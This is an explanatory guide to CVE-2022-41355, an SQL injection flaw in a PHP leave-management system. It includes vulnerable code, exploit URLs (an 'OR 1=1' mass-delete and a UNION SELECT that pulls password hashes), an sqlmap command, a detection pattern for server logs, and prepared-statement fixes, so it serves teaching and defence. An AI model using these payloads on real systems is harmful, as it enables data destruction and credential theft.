Author’s Note:
This guide breaks down CVE-2022-41355, a SQL injection flaw in Online Leave Management System v1.0. We’ll walk through what the vulnerability is, why it’s dangerous, how it can be exploited (“for educational use only!”), code snippets to understand the attack, and how to secure your systems.
🕵️♂️ What is CVE-2022-41355?
CVE-2022-41355 is a SQL injection vulnerability discovered in Online Leave Management System v1.0, a PHP and MySQL application. It allows attackers to execute arbitrary SQL commands because the id parameter reaches the query without sanitization or parameterization.
Affected URL:
/leave_system/classes/Master.php?f=delete_department&id=
If an attacker can change the id parameter's content, they can mess with your database — viewing, modifying, or deleting sensitive data.
Let's look at a (simplified) code snippet from Master.php:
    if($_GET['f'] == 'delete_department') {
        // $id is used verbatim from the query string: no cast, no escaping, no binding
        $id = $_GET['id'];
        // string interpolation builds the SQL text, so $id becomes part of the statement
        $query = "DELETE FROM department WHERE id = $id";
        $result = mysqli_query($conn, $query);
        if($result) {
            echo "Department deleted successfully!";
        }
    }
The problem:
The $id is taken straight from user input, not sanitized or parameterized. This allows attackers to inject their own SQL.
If you send this malicious URL to the server:
http://yourtarget.com/leave_system/classes/Master.php?f=delete_department&id=%20OR%201=1
the actual SQL becomes:
DELETE FROM department WHERE id = OR 1=1
Result:
Every row in your department table will be deleted, because 1=1 is always true!
1. Enumerate Data
Try injecting a UNION SELECT to fetch usernames from another table.
Say there’s a users table with username and password columns:
http://yourtarget.com/leave_system/classes/Master.php?f=delete_department&id=-1 UNION SELECT 1, username, password FROM users --
If output is reflected anywhere (error messages, page content), you might get usernames and hashes.
sqlmap automates SQL injection testing. Run:
sqlmap -u "http://yourtarget.com/leave_system/classes/Master.php?f=delete_department&id=1" --cookie="PHPSESSID=your-session" --dbs
This will check the parameter; if it’s injectable, it shows dumped database info.
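From the defender's side, the same request shapes are easy to spot in web-server logs: the affected endpoint only ever takes a numeric id, so any non-numeric value for `delete_department` is an attempt to alter the statement, and automated scanners usually announce themselves in the User-Agent. The following is an added Python example, not code from the leave system or the original post, that parses combined-format access-log lines and flags such requests. The log lines, IP addresses, timestamps and the sqlmap User-Agent string are constructed for the demonstration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines in Apache/nginx "combined" format (invented for this example).
# Lines 1 and 5 are ordinary traffic; lines 2-4 carry the payload shapes shown on this page
# or a scanner User-Agent (version string is a placeholder).
SAMPLE_LOG = """\
10.0.0.5 - - [06/Oct/2022:20:15:01 +0000] "GET /leave_system/classes/Master.php?f=delete_department&id=7 HTTP/1.1" 200 41 "-" "Mozilla/5.0"
10.0.0.5 - - [06/Oct/2022:20:15:09 +0000] "GET /leave_system/classes/Master.php?f=delete_department&id=%20OR%201=1 HTTP/1.1" 200 41 "-" "Mozilla/5.0"
10.0.0.9 - - [06/Oct/2022:20:16:30 +0000] "GET /leave_system/classes/Master.php?f=delete_department&id=-1%20UNION%20SELECT%201,username,password%20FROM%20users%20-- HTTP/1.1" 500 0 "-" "Mozilla/5.0"
10.0.0.9 - - [06/Oct/2022:20:17:02 +0000] "GET /leave_system/classes/Master.php?f=delete_department&id=1 HTTP/1.1" 200 41 "-" "sqlmap/1.6#stable (https://sqlmap.org)"
10.0.0.5 - - [06/Oct/2022:20:18:44 +0000] "GET /leave_system/index.php?page=home HTTP/1.1" 200 1203 "-" "Mozilla/5.0"
"""

# One combined-format log line: ip ident user [ts] "method target proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

AFFECTED_PATH = "/leave_system/classes/Master.php"   # endpoint named in the advisory
INT_RE = re.compile(r"^\d+$")                         # a department id is a plain positive integer


def parse_line(line):
    """Return the log fields as a dict, or None if the line is not combined format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def analyze_request(rec):
    """Return the list of reasons a parsed request is suspicious (empty if it looks normal)."""
    reasons = []
    if rec["ua"].lower().startswith("sqlmap"):
        reasons.append("sqlmap user-agent")
    parts = urlsplit(rec["target"])
    if parts.path == AFFECTED_PATH:
        # parse_qs percent-decodes values, so "%20OR%201=1" is inspected as " OR 1=1"
        qs = parse_qs(parts.query, keep_blank_values=True)
        if qs.get("f") == ["delete_department"]:
            for raw_id in qs.get("id", []):
                if not INT_RE.match(raw_id):
                    reasons.append(f"non-numeric id: {raw_id!r}")
    return reasons


def scan_log(text):
    """Scan log text and return (ip, timestamp, reasons) for every flagged request."""
    findings = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        reasons = analyze_request(rec)
        if reasons:
            findings.append((rec["ip"], rec["ts"], reasons))
    return findings


if __name__ == "__main__":
    for ip, ts, reasons in scan_log(SAMPLE_LOG):
        print(f"{ts} {ip}: {'; '.join(reasons)}")
```

The id check is deliberately an allow-list (digits only) rather than a search for SQL keywords; keyword lists miss encodings and case variations, while "must be an integer" is exactly the contract the handler already has.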
Do NOT trust user input. Ever.
- Use prepared statements with bound parameters:
    // the SQL text is fixed before any user data is seen
    $stmt = $conn->prepare("DELETE FROM department WHERE id = ?");
    // "i" binds the value as an integer, so it can never be read as SQL syntax
    $stmt->bind_param("i", $id);
    $stmt->execute();
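To see the interpolated and the parameterized handler side by side, here is an added Python example that is not code from the leave system or its author. It models the Master.php pattern against an in-memory SQLite table; the department schema and rows are constructed for the demonstration, and the injected value is the page's `OR 1=1` tautology with a leading id so the comparison parses. It contrasts three handlers: string interpolation, binding on its own, and integer validation followed by binding, which is what the mysqli `bind_param("i", ...)` fix above achieves.

```python
import sqlite3


def make_db():
    """Fresh in-memory database with a constructed department table (sample data, not the app's schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE department (id INTEGER PRIMARY KEY, name TEXT NOT NULL)")
    conn.executemany(
        "INSERT INTO department (id, name) VALUES (?, ?)",
        [(1, "Engineering"), (2, "Finance"), (3, "Human Resources")],
    )
    conn.commit()
    return conn


def delete_department_vulnerable(conn, raw_id):
    """Mirror of the Master.php pattern: the id is interpolated into the SQL text. Returns rows deleted."""
    cur = conn.execute(f"DELETE FROM department WHERE id = {raw_id}")
    conn.commit()
    return cur.rowcount


def delete_department_bound_only(conn, raw_id):
    """Binding alone: the whole string is a single value compared against id, never parsed as SQL."""
    cur = conn.execute("DELETE FROM department WHERE id = ?", (raw_id,))
    conn.commit()
    return cur.rowcount


def delete_department_safe(conn, raw_id):
    """Hardened handler: reject anything that is not a positive integer, then bind the integer."""
    if not isinstance(raw_id, str) or not raw_id.isdigit():
        raise ValueError(f"invalid department id: {raw_id!r}")
    cur = conn.execute("DELETE FROM department WHERE id = ?", (int(raw_id),))
    conn.commit()
    return cur.rowcount


def count_rows(conn):
    return conn.execute("SELECT COUNT(*) FROM department").fetchone()[0]


def demo():
    """Run each handler against a fresh table and report how many rows each call removed."""
    results = {}
    conn = make_db()
    results["vuln_normal"] = delete_department_vulnerable(conn, "2")            # 1 row, as intended
    conn = make_db()
    results["vuln_tautology"] = delete_department_vulnerable(conn, "1 OR 1=1")  # 3 rows: whole table
    conn = make_db()
    results["bound_tautology"] = delete_department_bound_only(conn, "1 OR 1=1")  # 0 rows: no id equals that text
    conn = make_db()
    try:
        delete_department_safe(conn, "1 OR 1=1")
        results["safe_tautology"] = "accepted"
    except ValueError:
        results["safe_tautology"] = "rejected"                                   # never reaches the database
    results["safe_normal"] = delete_department_safe(conn, "2")                  # 1 row, as intended
    results["rows_left_after_safe"] = count_rows(conn)                          # 2
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

Binding on its own already defeats the injection, since the database receives the statement and the value separately. The validation layer is still worth keeping: it turns garbage input into a clear error instead of a silent zero-row delete, and it documents the contract the endpoint has always had.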
🔗 Original References
- NVD - CVE-2022-41355
- Exploit Database Entry
- Full source code reference
🛡️ Conclusion
CVE-2022-41355 is a classic, easy-to-exploit SQL injection bug that could devastate your Online Leave Management System. It’s a textbook oversight: unsanitized user input in your SQL logic. If you run this system, fix it ASAP. Pen-testers and students, always get permission before testing!
Stay safe, code smart, and never trust user input!
*For responsible disclosure and training only — don’t be that attacker.*
Timeline
Published on: 10/06/2022 20:15:00 UTC
Last modified on: 10/07/2022 19:23:00 UTC